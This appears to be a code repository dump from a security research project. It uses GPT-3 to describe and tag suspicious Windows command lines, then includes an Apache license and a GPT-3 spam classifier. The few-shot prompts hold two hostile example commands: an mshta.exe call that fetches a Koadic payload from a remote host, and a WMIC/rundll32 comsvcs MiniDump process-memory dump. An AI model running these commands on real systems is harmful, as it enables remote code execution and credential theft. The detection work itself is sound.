Command, combine them and complete the Description.\n' 25 | 26 | 27 | PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES = '''### 28 | ## Command 29 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta 30 | ## Tags 31 | win_pc_suspicious_tasklist_command,win_suspicious_findstr 32 | ## Description 33 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command. 34 | ### 35 | ## Tags 36 | win_process_dump_rundll32_comsvcs,win_susp_wmi_execution,win_susp_wmic_proc_create_rundll32 37 | ## Description 38 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file. 39 | ## Command 40 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\" 41 | ### 42 | ''' 43 | 44 | 45 | PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES ='''### 46 | ## Command 47 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta 48 | ## Description 49 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command. 50 | ## Description 51 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file. 52 | ## Command 53 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\" 54 | ### 55 | ''' 56 | 57 | 58 | def preprocess_cmd_data(cmd, max_cmd_len): 59 | """ 60 | replaces "\n" with "" and reduces the data length. 61 | :param cmd: command line data 62 | :param max_cmd_len: the max data length 63 | """ 64 | return cmd.replace("\n", " ")[:max_cmd_len] 65 | 66 | 67 | def preprocess_tags_str(tags): 68 | """ 69 | replaces susp with suspicious otherwise, it can be miss-interpretted as suspended 70 | :param tags: tags 71 | """ 72 | if tags: 73 | tags = tags.replace("_susp_", "_suspicious_") 74 | return tags 75 | 76 | 77 | def get_prompt_for_desc_from_cmd_tag( 78 | cmd, 79 | tags, 80 | max_cmd_len=200, 81 | include_tag=True, 82 | include_prefix=False 83 | ): 84 | """ 85 | return a prompt as 86 | ## Command 87 | cmd.exe 88 | ## Tags 89 | win_tags 90 | ## Description 91 | the above command 92 | """ 93 | cmd = preprocess_cmd_data(cmd, max_cmd_len) 94 | 95 | if include_tag: 96 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES 97 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_ABOVE_DESC 98 | else: 99 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES 100 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_ABOVE_DESC 101 | 102 | if include_prefix: 103 | prompt = prefix + prompt 104 | return prompt 105 | 106 | 107 | def get_prompt_for_cmd_from_tag_desc( 108 | tags, 109 | desc, 110 | cmd, 111 | max_cmd_len=200, 112 | include_tag=True, 113 | include_prefix=False 114 | ): 115 | """ 116 | returns a prompt as 117 | ## Tags 118 | win_tags 119 | ## Description 120 | the below command will ... 121 | ## Command 122 | cmd.exe 123 | """ 124 | cmd = preprocess_cmd_data(cmd, max_cmd_len) 125 | 126 | if include_tag: 127 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES 128 | prompt = STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd 129 | else: 130 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES 131 | prompt = STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd 132 | 133 | if include_prefix: 134 | prompt = prefix + prompt 135 | return prompt 136 | 137 | 138 | def get_prompt_for_combined_desc( 139 | cmd, 140 | desc1, 141 | desc2, 142 | max_cmd_len=200 143 | ): 144 | """ 145 | return a prompt as 146 | STR_PREFIX_COMBINED_DESC 147 | ## Command 148 | ... 149 | ## Description1 150 | The command 151 | ## Description2 152 | The command 153 | ## Description 154 | The command 155 | """ 156 | cmd = preprocess_cmd_data(cmd, max_cmd_len) 157 | 158 | prompt = STR_PREFIX_COMBINED_DESC + STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_FIRST_DESC + desc1 + "\n" 159 | prompt += STR_PREFIX_SECOND_DESC + desc2 + "\n" + STR_PREFIX_DESC 160 | return prompt 161 | 162 | 163 | def run_openai_completion( 164 | prompt, 165 | engine, 166 | n, 167 | temperature=0.7, 168 | max_tokens=300, 169 | ): 170 | """ 171 | calls openai completion api. 172 | :param prompt: prompt data 173 | :param engine: openai engine 174 | :param n: number of outputs 175 | :param temperature: temperature to contral randomness, ranging between 0.0 and 1.0 176 | :param max_tokens: max output token size 177 | """ 178 | #to remove multi-line python code text add "\n" 179 | return openai.Completion.create( 180 | prompt=prompt, 181 | engine=engine, 182 | n=n, 183 | temperature=temperature, 184 | max_tokens=max_tokens, 185 | stop=["##", "\n"] 186 | ) 187 | 188 | 189 | def generate_text_list_with_prompt( 190 | prompt, 191 | engine="code-davinci-002", 192 | n=5, 193 | temperature=0.7, 194 | sleep_time=30 195 | ): 196 | """ 197 | generates a list of text with the prompt. 198 | :param prompt: prompt data 199 | :param engine: openai engine 200 | :param n: number of outputs 201 | :param temperature: temperature to contral randomness, ranging between 0.0 and 1.0 202 | :param max_tokens: max output token size 203 | :param sleep_time: sleep time in seconds 204 | """ 205 | text_list = [] 206 | while True: 207 | #if there are temp errors, then sleep and retry 208 | try: 209 | logging.debug("prompt:{}".format(prompt)) 210 | res = run_openai_completion( 211 | prompt, engine=engine, n=n, temperature=temperature) 212 | logging.debug("res:{}".format(res)) 213 | text_list = [item['text'] for item in res['choices']] 214 | break 215 | except openai.error.RateLimitError as ex: 216 | logging.error("RateLimitError, ex:{}".format(ex)) 217 | time.sleep(sleep_time) 218 | except openai.error.APIConnectionError as ex: 219 | logging.error("APIConnectionError, ex:{}".format(ex)) 220 | time.sleep(sleep_time) 221 | return text_list 222 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /spam_detector/gpt3_models.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | import pandas as pd 4 | import logging 5 | from sklearn.metrics import classification_report 6 | import openai 7 | 8 | 9 | # set your openai api key 10 | openai.api_key = os.getenv("OPENAI_API_KEY") 11 | # disable openai's logging messages 12 | logging.getLogger("openai").setLevel(logging.ERROR) 13 | 14 | logging.basicConfig(format="%(asctime)s %(message)s", 15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO) 16 | logger = logging.getLogger(__name__) 17 | 18 | 19 | PROMPT_TEMPLATE = "Classify the {data_type} as {positive_label} or {negative_label}." 20 | EXAMPLE_TEMPLATE = "\n{data_type}: {text}\nLabel: {label}" 21 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:" 22 | 23 | 24 | def generate_prompt_text( 25 | df, 26 | data_type="Message", 27 | positive_label="Spam", 28 | negative_label="Ham", 29 | column_text="text", 30 | column_label="label" 31 | ): 32 | """ 33 | generate a prompt from the input df. 34 | :param df: data frame for input data 35 | :param data_type: the type of data 36 | :param positive_label: the value for positive label 37 | :param negative_label: the value for negative label 38 | :param column_text: column for text 39 | :param column_label: column for label 40 | """ 41 | prompt = PROMPT_TEMPLATE.format( 42 | data_type=data_type, positive_label=positive_label, negative_label=negative_label) 43 | if df is None or len(df) == 0: 44 | return prompt 45 | 46 | for _ix, row in df.iterrows(): 47 | text = row[column_text] 48 | label = row[column_label] 49 | example_text = EXAMPLE_TEMPLATE.format( 50 | data_type=data_type, text=text, label=label) 51 | prompt += example_text 52 | return prompt 53 | 54 | 55 | def get_openai_completion( 56 | prompt, 57 | model_name="text-davinci-002", 58 | max_tokens=6, 59 | sleep_time=60 60 | ): 61 | """ 62 | get a completion response from openai. 63 | :param prompt: the input prompt 64 | :param model_name: model name 65 | :param max_tokens: the max token size for response 66 | :param sleep_time: sleep time in seconds 67 | """ 68 | label = None 69 | while True: 70 | try: 71 | logging.debug("prompt:{}".format(prompt)) 72 | res = openai.Completion.create( 73 | model=model_name, 74 | prompt=prompt, 75 | max_tokens=max_tokens, 76 | temperature=0, 77 | stop="\n" 78 | ) 79 | logging.debug("res:{}".format(res)) 80 | 81 | #remove the first white space and return the first word as a label. 82 | completion = res["choices"][0]["text"].strip() 83 | label = completion.split()[0] 84 | break 85 | except openai.error.RateLimitError as ex: 86 | logging.info("RateLimitError, ex:{}".format(ex)) 87 | time.sleep(sleep_time) 88 | except openai.error.APIConnectionError as ex: 89 | logging.info("APIConnectionError, ex:{}".format(ex)) 90 | time.sleep(sleep_time) 91 | return label 92 | 93 | 94 | def upload_train_jsonl_file( 95 | path_jsonl, 96 | df_train, 97 | data_type="Message", 98 | positive_label="Spam", 99 | negative_label="Ham", 100 | column_text="text", 101 | column_label="label", 102 | purpose="fine-tune", 103 | fine_tune_context_sample_size=4 104 | ): 105 | """ 106 | upload a train jsonl file to openai. 107 | :param path_jsonl: the path for training jsonl file 108 | :param df_train: df for training data 109 | :param data_type: data type 110 | :param positive_label: the value for positive label 111 | :param negative_label: the value for negative label 112 | :param column_text: column for text 113 | :param column_label: column for label 114 | :param purpose: the purpose of training data, fine-tune or classifications 115 | :param fine_tune_context_sample_size: the sampe size for prompt context 116 | """ 117 | text_label = "Label:" 118 | dict_items = [] 119 | for ix in range(0, len(df_train), fine_tune_context_sample_size): 120 | df_items = df_train.iloc[ix:ix+fine_tune_context_sample_size] 121 | context_prompt = generate_prompt_text( 122 | df_items, data_type=data_type, 123 | positive_label=positive_label, negative_label=negative_label, 124 | column_text=column_text, column_label=column_label) 125 | label_idx = context_prompt.rfind(text_label) + len(text_label) 126 | prompt = context_prompt[:label_idx] 127 | completion = context_prompt[label_idx:] 128 | dict_items.append({"prompt": prompt, "completion": completion}) 129 | 130 | df = pd.DataFrame(dict_items) 131 | df.to_json(path_jsonl, orient="records", lines=True) 132 | logger.info("train_jsonl:{}, df.shape:{}".format(path_jsonl, df.shape)) 133 | 134 | #update the file to openai 135 | try: 136 | res = openai.File.create(file=open(path_jsonl), purpose=purpose) 137 | train_file_id = res["id"] 138 | except Exception as ex: 139 | logger.error("openai.File.create() got an error, ex:{}".format(ex)) 140 | train_file_id = None 141 | return train_file_id 142 | 143 | 144 | def retrieve_openai_model(fine_tune_id): 145 | """ 146 | retreive the status of model fine-tuning. 147 | :param fine_tune_id: the id for model 148 | """ 149 | try: 150 | res = openai.FineTune.retrieve(id=fine_tune_id) 151 | id = res["id"] 152 | status = res["status"] # the status will be succeeded when completed. 153 | fine_tuned_model = res["fine_tuned_model"] 154 | logger.info("id:{}, status:{}, fine_tuned_model:{}".format( 155 | id, status, fine_tuned_model)) 156 | except Exception as ex: 157 | logger.error("openai.FineTune.retrieve() got an error, ex:{}".format(ex)) 158 | status, fine_tuned_model = None, None 159 | return status, fine_tuned_model 160 | 161 | 162 | def finetune_openai_model( 163 | training_file_id, 164 | suffix="detection", 165 | model="davinci", 166 | n_epochs=2, 167 | sleep_time_for_finetuning=60 168 | ): 169 | """ 170 | fine-tune an openai model. 171 | :param training_file_id: the file id for training data 172 | :param suffix: suffix for the model name 173 | :param model: the baseline model name 174 | :param n_epochs: number of training epochs 175 | :param sleep_time_for_finetuning: sleep time in seconds 176 | """ 177 | logger.info("## finetune_openai_model: {}".format(locals())) 178 | 179 | try: 180 | res = openai.FineTune.create(training_file=training_file_id, 181 | suffix=suffix, 182 | model=model, 183 | n_epochs=n_epochs) 184 | fine_tune_id = res["id"] 185 | status = res["status"] 186 | fine_tuned_model = res["fine_tuned_model"] 187 | logger.info("fine_tune_id:{}, status:{}, fine_tuned_model:{}".format( 188 | fine_tune_id, status, fine_tuned_model)) 189 | except Exception as ex: 190 | return None 191 | 192 | fine_tuned_model = None 193 | if sleep_time_for_finetuning > 0: 194 | while status != "succeeded": 195 | time.sleep(sleep_time_for_finetuning) 196 | try: 197 | status, fine_tuned_model = retrieve_openai_model(fine_tune_id) 198 | logger.info("finetuning status:{}".format(status)) 199 | except Exception as ex: 200 | logger.info( 201 | "finetuning retrieve_openai_model ex:{}".format(ex)) 202 | logger.info("finetuning status response:{}".format(res)) 203 | return fine_tuned_model 204 | 205 | 206 | def fine_tune_gpt3_model( 207 | df_train, 208 | path_train_jsonl, 209 | model_name, 210 | data_type="Message", 211 | positive_label="Spam", 212 | negative_label="Ham", 213 | column_text="text", 214 | column_label="label", 215 | fine_tune_context_sample_size=4 216 | ): 217 | """ 218 | fine-tune a gpt3 model with the training dataset. 219 | :param df_train: df for training data 220 | :param path_train_jsonl: file path for training json file 221 | :param model_name: baseline model name 222 | :param data_type: data type 223 | :param positive_label: the value for positive label 224 | :param negative_label: the value for negative label 225 | :param column_text: the column for text 226 | :param column_label: the column for label 227 | :param fine_tune_context_sample_size: sample size for context prompt 228 | """ 229 | training_file_id = upload_train_jsonl_file( 230 | path_train_jsonl, 231 | df_train, 232 | data_type=data_type, 233 | positive_label=positive_label, 234 | negative_label=negative_label, 235 | column_text=column_text, 236 | column_label=column_label, 237 | purpose="fine-tune", 238 | fine_tune_context_sample_size=fine_tune_context_sample_size 239 | ) 240 | logger.info("training_file_id:{}".format(training_file_id)) 241 | if training_file_id is None: 242 | return None 243 | 244 | fine_tuned_model_train = finetune_openai_model( 245 | training_file_id=training_file_id, 246 | suffix="detection_{}".format(data_type.lower()), 247 | model=model_name, 248 | n_epochs=2, 249 | sleep_time_for_finetuning=60 250 | ) 251 | logger.info("fine_tuned_model_train:{}".format(fine_tuned_model_train)) 252 | return fine_tuned_model_train 253 | 254 | 255 | def classify_message( 256 | message, 257 | path_train_data="spam_data/experiment_1/train_2.csv", 258 | num_samples_in_prompt=2 259 | ): 260 | """ 261 | classify the input message as spam or ham. 262 | spam_data/experiment_1/train_2.csv file has one ham and one spam samples. 263 | :param message: message data 264 | :param path_train_data: file path for few-shot samples 265 | :param num_samples_in_prompt: the number of samples in prompt 266 | """ 267 | df_train = pd.read_csv(path_train_data, sep="\t")[:num_samples_in_prompt] 268 | 269 | context_prompt = generate_prompt_text( 270 | df_train, data_type="Message", 271 | positive_label="Spam", negative_label="Ham", 272 | column_text="text", column_label="label") 273 | 274 | query_text = QUERY_TEMPLATE.format(data_type="Message", text=message) 275 | prompt = context_prompt + query_text 276 | logger.info("prompt:{}".format(prompt)) 277 | 278 | label = get_openai_completion(prompt, model_name="text-davinci-002") 279 | logger.info("label:{}".format(label)) 280 | return label 281 | 282 | 283 | def evaluate_gpt3_model( 284 | path_train_data, 285 | path_test_data, 286 | model_name="text-davinci-002", 287 | data_type="Message", 288 | column_text="text", 289 | column_label="label", 290 | positive_label="Spam", 291 | negative_label="Ham", 292 | fine_tune=False, 293 | fine_tuned_model="", 294 | fine_tune_context_sample_size=4, 295 | prompt_context_sample_size=3, 296 | sleep_time=1 297 | ): 298 | """ 299 | evaluate a gpt3 model with training and test datasets. 300 | :param path_train_data: path for training dataset 301 | :param path_test_data: path for test dataset 302 | :param model_name: baseline gpt3 model name, text-davinci-002 for few-shot, davinci for fine-tuning 303 | :param data_type: data type 304 | :param column_text: the column for text 305 | :param column_label: the column for label 306 | :param positive_label: the value for positive label 307 | :param negative_label: the value for negative label 308 | :param fine_tune: True to fine-tune 309 | :param fine_tuned_model: fine-tuned model name 310 | :param fine_tune_context_sample_size: the sample size for fine-tuning context prompt 311 | :param prompt_context_sample_size: the sample size for few-shot context prompt 312 | :param sleep_time: sleep time in seconds 313 | """ 314 | df_train = pd.read_csv(path_train_data, sep="\t") 315 | logger.info("path_train_data:{}, df_train.shape:{}".format( 316 | path_train_data, df_train.shape)) 317 | 318 | if fine_tune: 319 | path_train_jsonl = path_train_data + ".finetune.jsonl" 320 | model_name = fine_tune_gpt3_model( 321 | df_train, path_train_jsonl, model_name, 322 | data_type=data_type, 323 | positive_label=positive_label, 324 | negative_label=negative_label, 325 | column_text=column_text, 326 | column_label=column_label, 327 | fine_tune_context_sample_size=fine_tune_context_sample_size) 328 | if model_name is None: 329 | return None 330 | df_train = df_train.sample(prompt_context_sample_size, replace=False) 331 | elif fine_tuned_model: 332 | model_name = fine_tuned_model 333 | df_train = df_train.sample(prompt_context_sample_size, replace=False) 334 | 335 | context_prompt = generate_prompt_text( 336 | df_train, data_type=data_type, 337 | positive_label=positive_label, negative_label=negative_label, 338 | column_text=column_text, column_label=column_label) 339 | logger.info("context_prompt:{}".format(context_prompt)) 340 | 341 | df_test = pd.read_csv(path_test_data, sep="\t") 342 | logger.info("path_test_data:{}, df_test.shape:{}".format( 343 | path_test_data, df_test.shape)) 344 | 345 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:" 346 | y_test, y_pred = [], [] 347 | count_correct = 0 348 | for ix, row in df_test.iterrows(): 349 | text = row[column_text] 350 | label = row[column_label] 351 | logger.info("{}.text:{}".format(ix, text)) 352 | query_text = QUERY_TEMPLATE.format(data_type=data_type, text=text) 353 | prompt = context_prompt + query_text 354 | completion = get_openai_completion(prompt, model_name=model_name) 355 | if completion is not None: 356 | y_test.append(label == positive_label) 357 | y_pred.append(completion == positive_label) 358 | count_correct += 1 if label == completion else 0 359 | if sleep_time > 0: 360 | time.sleep(sleep_time) 361 | logger.info("label:{}, completion:{}, count_correct:{}".format( 362 | label, completion, count_correct)) 363 | 364 | return classification_report(y_test, y_pred, output_dict=True) 365 | -------------------------------------------------------------------------------- /spam_detector/spam_detector.py: -------------------------------------------------------------------------------- 1 | import os 2 | import logging 3 | import argparse 4 | import glob 5 | import numpy as np 6 | import pandas as pd 7 | import shutil 8 | from matplotlib import pyplot 9 | 10 | from sklearn_models import evaluate_sklearn_model 11 | from gpt3_models import evaluate_gpt3_model, classify_message 12 | 13 | 14 | logging.basicConfig(format="%(asctime)s %(message)s", 15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO) 16 | logger = logging.getLogger(__name__) 17 | 18 | 19 | MAX_TEXT_DATA_LEN = 200 20 | MAX_SKLEARN_ML_FEATURES = 1000 21 | 22 | 23 | def generate_datasets( 24 | path_output_folder="spam_data", 25 | path_input_tsv_file="spam_data/SMSSpamCollection", 26 | column_text="text", 27 | column_label="label", 28 | positive_label="Spam", 29 | train_sample_size_list=[1024, 512, 32, 8, 2], 30 | test_sample_size=256, 31 | max_text_data_len=MAX_TEXT_DATA_LEN 32 | ): 33 | """ 34 | generate train and test datasets from path_input_tsv_file. 35 | :param path_output_folder: output folder 36 | :param path_input_tsv_file: input data file 37 | :param column_text: column for text data 38 | :param column_label: column for label data 39 | :param positive_label: label value for positive samples 40 | :param train_sample_size_list: a list of training sample sizes 41 | :param test_sample_size: test sample size 42 | :param max_text_data_len: max text length for pre-processing 43 | """ 44 | # load the input tsv file 45 | df = pd.read_csv(path_input_tsv_file, header=None, 46 | sep="\t", names=[column_label, column_text]) 47 | 48 | # pre-process the label and text columns. 49 | df["label"] = df["label"].apply(lambda x: x.capitalize()) 50 | df["text"] = df["text"].apply(lambda x: x[:max_text_data_len]) 51 | logger.info("{}, df.shape:{}".format(path_input_tsv_file, df.shape)) 52 | logger.info("df['label'].value_counts:{}".format( 53 | df["label"].value_counts())) 54 | 55 | # suffle the df and split it into train and test datasets. 56 | df = df.sample(frac=1, replace=False) 57 | df_test, df_train = df[:test_sample_size], df[test_sample_size:] 58 | logger.info("df_test.shape:{}".format(df_test.shape)) 59 | logger.info("df_test['label'].value_counts:{}".format( 60 | df_test["label"].value_counts())) 61 | 62 | logger.info("df_train.shape:{}".format(df_train.shape)) 63 | logger.info("df_train['label'].value_counts:{}".format( 64 | df_train["label"].value_counts())) 65 | 66 | path_output = os.path.join(path_output_folder, "train.csv") 67 | df_train.to_csv(path_output, sep="\t", index=False) 68 | 69 | path_output = os.path.join(path_output_folder, "test.csv") 70 | df_test.to_csv(path_output, sep="\t", index=False) 71 | 72 | is_positive = df_train["label"] == positive_label 73 | df_train_positive = df_train[is_positive] 74 | df_train_negative = df_train[~is_positive] 75 | 76 | # generate training datasets 77 | for train_sample_size in train_sample_size_list: 78 | positive_sample_size = negative_sample_size = train_sample_size//2 79 | df_train_positive = df_train_positive.sample( 80 | positive_sample_size, replace=False) 81 | df_train_negative = df_train_negative.sample( 82 | negative_sample_size, replace=False) 83 | # create a balanced dataset both from positive and negative samples 84 | df_train_all = pd.concat( 85 | [df_train_positive, df_train_negative]).sample(frac=1, replace=False) 86 | 87 | path_output = os.path.join( 88 | path_output_folder, "train_{}.csv".format(train_sample_size)) 89 | df_train_all.to_csv(path_output, sep="\t", index=False) 90 | logger.info("{}, df_train_all.shape:{}".format( 91 | path_output, df_train_all.shape)) 92 | logger.info("df_train_all['label'].value_counts:{}".format( 93 | df_train_all["label"].value_counts())) 94 | 95 | 96 | def evaluate_model_with_train_sample_sizes( 97 | path_results_output, 98 | model_name="RandomForest", 99 | path_data_folder="spam_data", 100 | train_sample_size_list=[2, 8, 32, 512, 1024], 101 | data_type="Message", 102 | column_text="text", 103 | column_label="label", 104 | positive_label="Spam", 105 | negative_label="Ham", 106 | fine_tune=True, 107 | fine_tuned_model="", 108 | fine_tune_context_sample_size=4, 109 | prompt_context_sample_size=3, 110 | sleep_time=1 111 | ): 112 | """ 113 | evaluate a ML model with train sample sizes. 114 